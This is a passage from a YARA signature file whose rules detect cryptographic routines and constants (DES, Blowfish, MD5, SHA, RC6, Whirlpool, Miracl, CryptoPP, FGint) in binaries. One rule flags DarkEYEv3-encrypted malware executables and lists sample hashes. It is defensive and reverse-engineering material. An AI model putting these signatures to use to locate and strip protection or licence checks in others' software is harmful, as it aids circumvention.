?? ?? ?? 89 45 F4 33 D2 55 68 ?? ?? ?? ?? 64 FF 32 64 89 22 6A 00 6A 00 8B 45 F4 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 6A 00 33 C9 B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 F0 33 D2 55 68 ?? ?? ?? ?? 
64 FF 32 64 89 22 6A 00 6A 00 56 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FlyUtilsCnDES_ECB_Decrypt {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for FlyUtils.CnDES Decrypt ECB function\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 E8 53 56 57 33 DB 89 5D E8 89 5D EC 8B F9 89 55 F8 89 45 FC 8B 5D 18 8B 75 20 8B 45 FC E8 ?? ?? ?? ?? 8B 45 F8 E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 84 DB 74 18 8B D3 8D 4D EC 8B 45 F8 E8 ?? ?? ?? ?? 8B 55 EC 8D 45 F8 E8 ?? ?? ?? ?? 85 FF 75 07 E8 ?? ?? ?? ?? 8B F8 85 F6 75 07 E8 ?? ?? ?? ?? 8B F0 8B 4D FC B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 F4 33 D2 55 68 ?? ?? ?? ?? 64 FF 32 64 89 22 57 6A 00 33 C9 B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 F0 33 D2 55 68 ?? ?? ?? ?? 64 FF 32 64 89 22 6A 00 6A 00 56 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 FF 75 14 FF 75 10 8B 45 0C 50 8B 4D F8 8B 55 F0 8B 45 F4 E8 ?? ?? ?? ?? 6A 00 6A 00 8B 45 F0 E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 55 08 8B 45 F0 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 EB 12 E9 ?? ?? ?? ?? 8B 45 08 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 F0 33 D2 89 55 F0 E8 ?? ?? ?? ?? C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule Elf_Hash {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for ElfHash\"\r\n\t\tdate = \"2015-06\"\r\n\t\tversion = \"0.3\"\r\n\tstrings:\r\n\t\t$c0 = { 53 56 33 C9 8B DA 4B 85 DB 7C 25 43 C1 E1 04 33 D2 8A 10 03 CA 8B D1 81 E2 00 00 00 F0 85 D2 74 07 8B F2 C1 EE 18 33 CE F7 D2 23 CA 40 4B 75 DC 8B C1 5E 5B C3 }\r\n\t\t$c1 = { 53 33 D2 85 C0 74 2B EB 23 C1 E2 04 81 E1 FF 00 00 00 03 D1 8B CA 81 E1 00 00 00 F0 85 C9 74 07 8B D9 C1 EB 18 33 D3 F7 D1 23 D1 40 8A 08 84 C9 75 D7 8B C2 5B C3 }\r\n\t\t$c2 = { 53 56 33 C9 8B D8 85 D2 76 23 C1 E1 04 33 C0 8A 03 03 C8 8B C1 25 00 00 00 F0 85 C0 74 07 8B F0 C1 EE 18 33 CE F7 D0 23 C8 43 4A 75 DD 8B C1 5E 5B C3 }\r\n\t\t$c3 = { 53 56 57 8B F2 8B D8 8B FB 53 E8 ?? ?? ?? ?? 
6B C0 02 71 05 E8 ?? ?? ?? ?? 8B D7 33 C9 8B D8 83 EB 01 71 05 E8 ?? ?? ?? ?? 85 DB 7C 2C 43 C1 E1 04 0F B6 02 03 C8 71 05 E8 ?? ?? ?? ?? 83 C2 01 B8 00 00 00 F0 23 C1 85 C0 74 07 8B F8 C1 EF 18 33 CF F7 D0 23 C8 4B 75 D5 8B C1 99 F7 FE 8B C2 85 C0 7D 09 03 C6 71 05 E8 ?? ?? ?? ?? 5F 5E 5B C3 }\r\n\t\t$c4 = { 53 33 D2 EB 2C 8B D9 80 C3 BF 80 EB 1A 73 03 80 C1 20 C1 E2 04 81 E1 FF 00 00 00 03 D1 8B CA 81 E1 00 00 00 F0 8B D9 C1 EB 18 33 D3 F7 D1 23 D1 40 8A 08 84 C9 75 CE 8B C2 5B C3 }\r\n\t\t$c5 = { 89 C2 31 C0 85 D2 74 30 2B 42 FC 74 2B 89 C1 29 C2 31 C0 53 0F B6 1C 11 01 C3 8D 04 1B C1 EB 14 8D 04 C5 00 00 00 00 81 E3 00 0F 00 00 31 D8 83 C1 01 75 E0 C1 E8 04 5B C3 }\r\n\t\t$c6 = { 53 33 D2 85 C0 74 38 EB 30 8B D9 80 C3 BF 80 EB 1A 73 03 80 C1 20 C1 E2 04 81 E1 FF 00 00 00 03 D1 8B CA 81 E1 00 00 00 F0 85 C9 74 07 8B D9 C1 EB 18 33 D3 F7 D1 23 D1 40 8A 08 84 C9 75 CA 8B C2 5B C3 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule BLOWFISH_Constants {\r\n\tmeta:\r\n\t\tauthor = \"phoul (@phoul)\"\r\n\t\tdescription = \"Look for Blowfish constants\"\r\n\t\tdate = \"2014-01\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { D1310BA6 }\r\n\t\t$c1 = { A60B31D1 }\t\r\n\t\t$c2 = { 98DFB5AC }\r\n\t\t$c3 = { ACB5DF98 }\r\n\t\t$c4 = { 2FFD72DB }\r\n\t\t$c5 = { DB72FD2F }\r\n\t\t$c6 = { D01ADFB7 }\r\n\t\t$c7 = { B7DF1AD0 }\r\n\t\t$c8 = { 4B7A70E9 }\r\n\t\t$c9 = { E9707A4B }\r\n\t\t$c10 = { F64C261C }\r\n\t\t$c11 = { 1C264CF6 }\r\n\tcondition:\r\n\t\t6 of them\r\n}\r\n\r\nrule MD5_Constants {\r\n\tmeta:\r\n\t\tauthor = \"phoul (@phoul)\"\r\n\t\tdescription = \"Look for MD5 constants\"\r\n\t\tdate = \"2014-01\"\r\n\t\tversion = \"0.2\"\r\n\tstrings:\r\n\t\t// Init constants\r\n\t\t$c0 = { 67452301 }\r\n\t\t$c1 = { efcdab89 }\r\n\t\t$c2 = { 98badcfe }\r\n\t\t$c3 = { 10325476 }\r\n\t\t$c4 = { 01234567 }\r\n\t\t$c5 = { 89ABCDEF }\r\n\t\t$c6 = { FEDCBA98 }\r\n\t\t$c7 = { 76543210 }\r\n\t\t// Round 2\r\n\t\t$c8 = { F4D50d87 }\r\n\t\t$c9 = { 78A46AD7 
}\r\n\tcondition:\r\n\t\t5 of them\r\n}\r\n\r\nrule MD5_API {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Looks for MD5 API\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$advapi32 = \"advapi32.dll\" wide ascii nocase\r\n\t\t$cryptdll = \"cryptdll.dll\" wide ascii nocase\r\n\t\t$MD5Init = \"MD5Init\" wide ascii\r\n\t\t$MD5Update = \"MD5Update\" wide ascii\r\n\t\t$MD5Final = \"MD5Final\" wide ascii\r\n\tcondition:\r\n\t\t($advapi32 or $cryptdll) and ($MD5Init and $MD5Update and $MD5Final)\r\n}\r\n\r\nrule RC6_Constants {\r\n\tmeta:\r\n\t\tauthor = \"chort (@chort0)\"\r\n\t\tdescription = \"Look for RC6 magic constants in binary\"\r\n\t\treference = \"https://twitter.com/mikko/status/417620511397400576\"\r\n\t\treference2 = \"https://twitter.com/dyngnosis/status/418105168517804033\"\r\n\t\tdate = \"2013-12\"\r\n\t\tversion = \"0.2\"\r\n\tstrings:\r\n\t\t$c1 = { B7E15163 }\r\n\t\t$c2 = { 9E3779B9 }\r\n\t\t$c3 = { 6351E1B7 }\r\n\t\t$c4 = { B979379E }\r\n\tcondition:\r\n\t\t2 of them\r\n}\r\n\r\nrule RIPEMD160_Constants {\r\n\tmeta:\r\n\t\tauthor = \"phoul (@phoul)\"\r\n\t\tdescription = \"Look for RIPEMD-160 constants\"\r\n\t\tdate = \"2014-01\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 67452301 }\r\n\t\t$c1 = { EFCDAB89 }\r\n\t\t$c2 = { 98BADCFE }\r\n\t\t$c3 = { 10325476 }\r\n\t\t$c4 = { C3D2E1F0 }\r\n\t\t$c5 = { 01234567 }\r\n\t\t$c6 = { 89ABCDEF }\r\n\t\t$c7 = { FEDCBA98 }\r\n\t\t$c8 = { 76543210 }\r\n\t\t$c9 = { F0E1D2C3 }\r\n\tcondition:\r\n\t\t5 of them\r\n}\r\n\r\nrule SHA1_Constants {\r\n\tmeta:\r\n\t\tauthor = \"phoul (@phoul)\"\r\n\t\tdescription = \"Look for SHA1 constants\"\r\n\t\tdate = \"2014-01\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 67452301 }\r\n\t\t$c1 = { EFCDAB89 }\r\n\t\t$c2 = { 98BADCFE }\r\n\t\t$c3 = { 10325476 }\r\n\t\t$c4 = { C3D2E1F0 }\r\n\t\t$c5 = { 01234567 }\r\n\t\t$c6 = { 89ABCDEF }\r\n\t\t$c7 = { FEDCBA98 }\r\n\t\t$c8 = { 76543210 }\r\n\t\t$c9 = { F0E1D2C3 }\r\n\t\t//added by _pusher_ 
2016-07 - last round\r\n\t\t$c10 = { D6C162CA }\r\n\tcondition:\r\n\t\t5 of them\r\n}\r\n\r\nrule SHA512_Constants {\r\n\tmeta:\r\n\t\tauthor = \"phoul (@phoul)\"\r\n\t\tdescription = \"Look for SHA384/SHA512 constants\"\r\n\t\tdate = \"2014-01\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 428a2f98 }\r\n\t\t$c1 = { 982F8A42 }\r\n\t\t$c2 = { 71374491 }\r\n\t\t$c3 = { 91443771 }\r\n\t\t$c4 = { B5C0FBCF }\r\n\t\t$c5 = { CFFBC0B5 }\r\n\t\t$c6 = { E9B5DBA5 }\r\n\t\t$c7 = { A5DBB5E9 }\r\n\t\t$c8 = { D728AE22 }\r\n\t\t$c9 = { 22AE28D7 }\r\n\tcondition:\r\n\t\t5 of them\r\n}\r\n\r\nrule TEAN {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for TEA Encryption\"\r\n\t\tdate = \"2016-08\"\r\n\tstrings:\r\n\t\t$c0 = { 2037EFC6 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule WHIRLPOOL_Constants {\r\n\tmeta:\r\n\t\tauthor = \"phoul (@phoul)\"\r\n\t\tdescription = \"Look for WhirlPool constants\"\r\n\t\tdate = \"2014-02\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 18186018c07830d8 }\r\n\t\t$c1 = { d83078c018601818 }\r\n\t\t$c2 = { 23238c2305af4626 }\r\n\t\t$c3 = { 2646af05238c2323 }\r\n\tcondition:\r\n\t\t2 of them\r\n}\r\n\r\nrule DarkEYEv3_Cryptor {\r\n\tmeta:\r\n\t\tdescription = \"Rule to detect DarkEYEv3 encrypted executables (often malware)\"\r\n\t\tauthor = \"Florian Roth\"\r\n\t\treference = \"http://darkeyev3.blogspot.fi/\"\r\n\t\tdate = \"2015-05-24\"\r\n\t\thash0 = \"6b854b967397f7de0da2326bdd5d39e710e2bb12\"\r\n\t\thash1 = \"d53149968eca654fc0e803f925e7526fdac2786c\"\r\n\t\thash2 = \"7e3a8940d446c57504d6a7edb6445681cca31c65\"\r\n\t\thash3 = \"d3dd665dd77b02d7024ac16eb0949f4f598299e7\"\r\n\t\thash4 = \"a907a7b74a096f024efe57953c85464e87275ba3\"\r\n\t\thash5 = \"b1c422155f76f992048377ee50c79fe164b22293\"\r\n\t\thash6 = \"29f5322ce5e9147f09e0a86cc23a7c8dc88721b9\"\r\n\t\thash7 = \"a0382d7c12895489cb37efef74c5f666ea750b05\"\r\n\t\thash8 = \"f3d5b71b7aeeb6cc917d5bb67e2165cf8a2fbe61\"\r\n\t\tscore = 55\r\n\tstrings:\r\n\t\t$s0 = 
\"\\\\DarkEYEV3-\" \r\n\tcondition:\r\n\t\tuint16(0) == 0x5a4d and $s0\r\n}\r\n\r\nrule Miracl_powmod\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"Miracl powmod\"\r\n\tstrings:\r\n\t\t$c0 = { 53 55 56 57 E8 ?? ?? ?? ?? 8B F0 8B 86 18 02 00 00 85 C0 0F 85 EC 01 00 00 8B 56 1C 42 8B C2 89 56 1C 83 F8 18 7D 17 C7 44 86 20 12 00 00 00 8B 86 2C 02 00 00 85 C0 74 05 E8 ?? ?? ?? ?? 8B 06 8B 4E 10 3B C1 74 2E 8B 7C 24 1C 57 E8 ?? ?? ?? ?? 83 C4 04 83 F8 02 7C 33 8B 57 04 8B 0E 51 8B 02 50 E8 ?? ?? ?? ?? 83 C4 08 83 F8 01 0F 84 58 01 00 00 EB 17 8B 7C 24 1C 6A 02 57 E8 ?? ?? ?? ?? 83 C4 08 85 C0 0F 84 3F 01 00 00 8B 8E C4 01 00 00 8B 54 24 18 51 52 E8 ?? ?? ?? ?? 8B 86 CC }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule Miracl_crt\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"Miracl crt\"\r\n\tstrings:\r\n\t\t$c0 = { 51 56 57 E8 ?? ?? ?? ?? 8B 74 24 10 8B F8 89 7C 24 08 83 7E 0C 02 0F 8C 99 01 00 00 8B 87 18 02 00 00 85 C0 0F 85 8B 01 00 00 8B 57 1C 42 8B C2 89 57 1C 83 F8 18 7D 17 C7 44 87 20 4A 00 00 00 8B 87 2C 02 00 00 85 C0 74 05 E8 ?? ?? ?? ?? 8B 46 04 8B 54 24 14 53 55 8B 08 8B 02 51 50 E8 ?? ?? ?? ?? 8B 4E 0C B8 01 00 00 00 83 C4 08 33 ED 3B C8 89 44 24 18 0F 8E C5 00 00 00 BF 04 00 00 00 8B 46 04 8B 0C 07 8B 10 8B 44 24 1C 51 52 8B 0C 07 51 E8 ?? ?? ?? ?? 8B 56 04 8B 4E 08 8B 04 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule CryptoPP_a_exp_b_mod_c\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"CryptoPP a_exp_b_mod_c\"\r\n\tstrings:\r\n\t\t$c0 = { 6A FF 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 81 EC ?? 00 00 00 56 8B B4 24 B0 00 00 00 57 6A 00 8B CE C7 44 24 0C 00 00 00 00 E8 ?? ?? ?? ?? 84 C0 0F 85 16 01 00 00 8D 4C 24 24 E8 ?? ?? ?? ?? BF 01 00 00 00 56 8D 4C 24 34 89 BC 24 A4 00 00 00 E8 ?? ?? ?? ?? 8B 06 8D 4C 24 3C 50 6A 00 C6 84 24 A8 00 00 00 02 E8 ?? ?? ?? ?? 8D 4C 24 48 C6 84 24 A0 00 00 00 03 E8 ?? ?? ?? ?? C7 44 24 24 ?? ?? ?? ?? 
8B 8C 24 AC 00 00 00 8D 54 24 0C 51 52 8D 4C 24 2C C7 84 24 A8 }\r\n\t\t$c1 = { 6A FF 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 4C 56 57 33 FF 8D 44 24 0C 89 7C 24 08 C7 44 24 10 ?? ?? ?? ?? C7 44 24 0C ?? ?? ?? ?? 89 44 24 14 8B 74 24 70 8D 4C 24 18 56 89 7C 24 60 E8 ?? ?? ?? ?? 8B 76 08 8D 4C 24 2C 56 57 C6 44 24 64 01 E8 ?? ?? ?? ?? 8D 4C 24 40 C6 44 24 5C 02 E8 ?? ?? ?? ?? C7 44 24 0C ?? ?? ?? ?? 8B 4C 24 6C 8B 54 24 68 8B 74 24 64 51 52 56 8D 4C 24 18 C7 44 24 68 03 00 00 00 E8 ?? ?? ?? ?? 8B 7C 24 4C 8B 4C 24 48 8B D7 33 C0 F3 }\r\n\t\t$c2 = { 6A FF 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 34 56 57 33 FF 8D 44 24 0C 89 7C 24 08 C7 44 24 10 ?? ?? ?? ?? C7 44 24 0C ?? ?? ?? ?? 89 44 24 14 8B 74 24 58 8D 4C 24 18 56 89 7C 24 48 E8 ?? ?? ?? ?? 8B 0E C6 44 24 44 01 51 57 8D 4C 24 2C E8 ?? ?? ?? ?? 8D 4C 24 30 C6 44 24 44 02 E8 ?? ?? ?? ?? C7 44 24 0C ?? ?? ?? ?? 8B 54 24 54 8B 44 24 50 8B 74 24 4C 52 50 56 8D 4C 24 18 C7 44 24 50 03 00 00 00 E8 ?? ?? ?? ?? 8B 4C 24 30 8B 7C 24 34 33 C0 F3 AB 8B 4C }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule CryptoPP_modulo\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"CryptoPP modulo\"\r\n\tstrings:\r\n\t\t$c0 = { 83 EC 20 53 55 8B 6C 24 2C 8B D9 85 ED 89 5C 24 08 75 18 8D 4C 24 0C E8 ?? ?? ?? ?? 8D 44 24 0C 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 4D FF 56 85 CD 57 75 09 8B 53 04 8B 02 23 C1 EB 76 8B CB E8 ?? ?? ?? ?? 83 FD 05 8B C8 77 2D 33 F6 33 FF 49 85 C0 74 18 8B 53 04 8D 41 01 8D 14 8A 8B 0A 03 F1 83 D7 00 48 83 EA 04 85 C0 77 F1 6A 00 55 57 56 E8 ?? ?? ?? ?? EB 3B 33 C0 8B D1 49 85 D2 74 32 8B 54 24 10 33 DB 8D 71 01 8B 52 04 8D 3C 8A 8B 17 33 ED 0B C5 8B 6C 24 34 33 C9 53 0B CA 55 }\r\n\t\t$c1 = { 6A FF 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 2C 56 57 8B F1 33 FF 8D 4C 24 20 89 7C 24 08 E8 ?? ?? ?? ?? 8D 4C 24 0C 89 7C 24 3C E8 ?? ?? ?? ?? 8B 44 24 48 8D 4C 24 0C 50 56 8D 54 24 28 51 52 C6 44 24 4C 01 E8 ?? ?? ?? ?? 
8B 74 24 54 83 C4 10 8D 44 24 20 8B CE 50 E8 ?? ?? ?? ?? 8B 7C 24 18 8B 4C 24 14 8B D7 33 C0 F3 AB 52 E8 ?? ?? ?? ?? 8B 7C 24 30 8B 4C 24 2C 8B D7 33 C0 C7 44 24 10 ?? ?? ?? ?? 52 F3 AB E8 ?? ?? ?? ?? 8B 4C 24 3C 83 C4 08 8B C6 64 89 }\r\n\t\t$c2 = { 83 EC 24 53 55 8B 6C 24 30 8B D9 85 ED 89 5C 24 08 75 18 8D 4C 24 0C E8 ?? ?? ?? ?? 8D 44 24 0C 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 4D FF 56 85 CD 57 75 09 8B 53 0C 8B 02 23 C1 EB 76 8B CB E8 ?? ?? ?? ?? 83 FD 05 8B C8 77 2D 33 F6 33 FF 49 85 C0 74 18 8B 53 0C 8D 41 01 8D 14 8A 8B 0A 03 F1 83 D7 00 48 83 EA 04 85 C0 77 F1 6A 00 55 57 56 E8 ?? ?? ?? ?? EB 3B 33 C0 8B D1 49 85 D2 74 32 8B 54 24 10 33 DB 8D 71 01 8B 52 0C 8D 3C 8A 8B 17 33 ED 0B C5 8B 6C 24 38 33 C9 53 0B CA 55 }\r\n\t\t$c3 = { 6A FF 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 1C 56 57 8B F1 33 FF 8D 4C 24 0C 89 7C 24 08 E8 ?? ?? ?? ?? 8D 4C 24 18 89 7C 24 2C E8 ?? ?? ?? ?? 8B 44 24 38 8D 4C 24 18 50 56 8D 54 24 14 51 52 C6 44 24 3C 01 E8 ?? ?? ?? ?? 8B 74 24 44 83 C4 10 8D 44 24 0C 8B CE 50 E8 ?? ?? ?? ?? 8B 4C 24 18 8B 7C 24 1C 33 C0 F3 AB 8B 4C 24 1C 51 E8 ?? ?? ?? ?? 8B 4C 24 10 8B 7C 24 14 33 C0 F3 AB 8B 54 24 14 52 E8 ?? ?? ?? ?? 8B 4C 24 2C 83 C4 08 8B C6 64 89 0D 00 00 00 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule FGint_MontgomeryModExp\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-06\"\r\n\t\tversion = \"0.2\"\r\n\t\tdescription = \"FGint MontgomeryModExp\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 ?? 53 56 57 33 DB 89 5D ?? 8B F1 8B DA 89 45 ?? 8B 7D 08 8D 45 F4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 EC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 DC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 D4 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF 8B D6 8B 45 FC E8 ?? ?? ?? ?? 8D 55 D4 8B C7 E8 ?? ?? ?? ?? 3C 02 75 0D 8D 45 D4 E8 ?? ?? ?? ?? E9 }\r\n\t\t$c1 = { 55 8B EC 83 C4 ?? 
53 56 57 33 DB 89 5D ?? 8B F1 8B DA 89 45 ?? 8D 45 F4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 EC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 DC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 D4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 D4 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF 8B D6 8B 45 FC E8 ?? ?? ?? ?? 8D 55 D4 8B C7 E8 ?? ?? ?? ?? 3C 02 75 0D 8D 45 D4 E8 ?? ?? ?? ?? E9 }\r\n\t\t$c2 = { 55 8B EC 83 C4 ?? 53 56 57 33 DB 89 5D ?? 8B F1 8B DA 89 45 ?? 8B 7D 08 8D 45 F4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 EC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 DC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 D4 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF 8B D6 8B 45 ?? E8 ?? ?? ?? ?? 8D 55 D4 8B C7 E8 ?? ?? ?? ?? 3C 02 75 0D 8D 45 D4 E8 ?? ?? ?? ?? E9 }\r\n\t\t$c3 = { 55 8B EC 83 C4 ?? 53 56 57 33 DB 89 5D ?? 8B F1 8B DA 89 45 D0 8B 7D 08 8D 45 F4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 EC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 DC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 D4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 47 4C 47 00 64 FF 30 64 89 20 8D 55 D4 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF 8B D6 8B 45 D0 E8 ?? ?? ?? ?? 8D 55 D4 8B C7 E8 ?? ?? ?? ?? 3C 02 75 0D 8D 45 D4 E8 ?? ?? ?? ?? E9 02 02 00 00 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule FGint_FGIntModExp\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-05\"\r\n\t\tdescription = \"FGint FGIntModExp\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 E8 53 56 57 33 DB 89 5D ?? 8B F1 89 55 ?? 8B D8 8B 7D 08 8D 45 F4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 EC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 46 04 8B 40 04 83 E0 01 83 F8 01 75 0F 57 8B CE 8B 55 ?? 8B C3 E8 ?? ?? ?? ?? 
EB ?? 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 F4 8B C3 E8 ?? ?? ?? ?? 8B 45 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_MulByInt\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-05\"\r\n\t\tdescription = \"FGint MulByInt\"\r\n\tstrings:\r\n\t\t$c0 = { 53 56 57 55 83 C4 E8 89 4C 24 04 8B EA 89 04 24 8B 04 24 8B 40 04 8B 00 89 44 24 08 8B 44 24 08 83 C0 02 50 8D 45 04 B9 01 00 00 00 8B 15 ?? ?? ?? ?? ?? ?? ?? ?? ?? 83 C4 04 33 F6 8B 7C 24 08 85 FF 76 6D BB 01 00 00 00 8B 04 24 8B 40 04 8B 04 98 33 D2 89 44 24 10 89 54 24 14 8B 44 24 04 33 D2 52 50 8B 44 24 18 8B 54 24 1C ?? ?? ?? ?? ?? 89 44 24 10 89 54 24 14 8B C6 33 D2 03 44 24 10 13 54 24 14 89 44 24 10 89 54 24 14 8B 44 24 10 25 FF FF FF 7F 8B 55 04 89 04 9A 8B 44 24 10 8B 54 24 14 0F AC D0 1F C1 EA 1F 8B F0 43 4F 75 98 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_DivMod\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-05\"\r\n\t\tdescription = \"FGint FGIntDivMod\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 BC 53 56 57 8B F1 89 55 F8 89 45 FC 8B 5D 08 8D 45 F0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 D8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 45 FC 8A 00 88 45 D7 8B 45 F8 8A 00 88 45 D6 8B 45 FC E8 ?? ?? ?? ?? 8B 45 F8 E8 ?? ?? ?? ?? 8B D3 8B 45 FC E8 ?? ?? ?? ?? 8D 55 E0 8B 45 F8 E8 ?? ?? ?? ?? 8B 55 F8 8B 45 FC }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_FGIntDestroy\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-05\"\r\n\t\tdescription = \"FGint FGIntDestroy\"\r\n\tstrings:\r\n\t\t$c0 = { 53 8B D8 8D 43 04 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 
5B C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_Base10StringToGInt\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-06\"\r\n\t\tversion = \"0.2\"\r\n\t\tdescription = \"FGint Base10StringToGInt\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC B9 04 00 00 00 6A 00 6A 00 49 75 F9 51 53 56 57 8B DA 89 45 FC 8B 45 FC ?? ?? ?? ?? ?? 33 C0 55 ?? ?? ?? ?? ?? 64 FF 30 64 89 20 EB 12 8D 45 FC B9 01 00 00 00 BA 01 00 00 00 ?? ?? ?? ?? ?? 8B 45 FC 8A 00 2C 2D 74 11 04 FD 2C 0A 72 0B 8B 45 FC ?? ?? ?? ?? ?? 48 7F D4 8D 45 E4 50 B9 01 00 00 00 BA 01 00 00 00 8B 45 FC ?? ?? ?? ?? ?? 8B 45 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 75 18 C6 45 EB 00 8D 45 FC B9 01 00 00 00 BA 01 00 00 00 ?? ?? ?? ?? ?? EB 18 C6 45 EB 01 EB 12 8D 45 FC }\r\n\t\t$c1 = { 55 8B EC 83 C4 D8 53 56 57 33 C9 89 4D D8 89 4D DC 89 